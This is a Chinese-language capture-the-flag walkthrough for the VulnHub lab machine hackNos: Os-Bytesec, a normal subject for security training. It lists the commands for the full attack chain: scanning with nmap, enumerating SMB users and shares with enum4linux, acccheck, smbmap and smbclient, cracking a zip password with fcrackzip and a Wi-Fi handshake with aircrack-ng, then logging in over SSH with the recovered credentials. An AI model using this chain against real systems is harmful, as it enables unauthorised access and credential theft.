靶机下载地址:hackNos: Os-Bytesec ~ VulnHub
导入到VM中如果扫不到ip,就将ova文件导入到Oracle VM VirtualBox中,网络配置如下
用如下命令扫描靶机ip:nmap 192.168.7.0/24 -sn | grep -B 2 '08:00:27:23:A6:00',其中08:00:27:23:A6:00是靶机的Mac地址
主页长这个样子
进行目录扫描发现没有什么有用信息,从页面上继续寻找其他可用信息,在网站最下面有这样一段字样GET smb free,想到靶机开放了445端口,考虑使用smb为切入点
用kali自带的工具进行用户枚举,enum4linux -U 192.168.7.139,得到一个smb用户,且为空密码
从github上下载另外一个工具,第一条命令下载不上,可以先下载到本机,在拖到kali中解压,如果输入到最后一条命令发现.pl文件没有执行权限,直接 chmod 777 acccheck.pl
git clone https://github.com/qashqao/acccheck.git
unzip acccheck-master.zip
cd acccheck-master
./acccheck.pl -t 192.168.1.64 -u smb -v
使用smbmap
枚举靶机的共享资源并使用smbclient
进行登录
smbmap -u 'smb' -p '' -H 192.168.7.139 #枚举靶机的共享资源
smbclient -L 192.168.1.64 -U smb #查看靶机的共享目录
smbclient //192.168.1.64/print$ -U smb #登录目标靶机
查看发现没有可利用的文件,尝试进入smb用户的目录下(网站首页中也提到GET...smb...free
)发现有两个文件并使用get
命令下载
zip文件需要解压密码,使用fcrackzip
进行破解,得到压缩包密码:hacker1
,而main.txt
中只有个字符串helo
(密码字典可以去github上自行下载)
apt-get install fcrackzip 使用这条命令下载工具
fcrackzip -p /home/kali/mm.txt -u safe.zip -p指定字典
解压缩包后发现两个文件secret.jpg
图片文件和user.cap
网络包文件并使用Wireshark
查看为无线网络数据包,发现无线网络的SSID为blackjax
这里使用aircrack-ng
破解无线密码,最后得到账号密码为 blackjax / snowflake
aircrack-ng -w /home/kali/mm.txt user.cap
最后进行ssh连接
ssh blackjax@192.168.7.139 -p 2525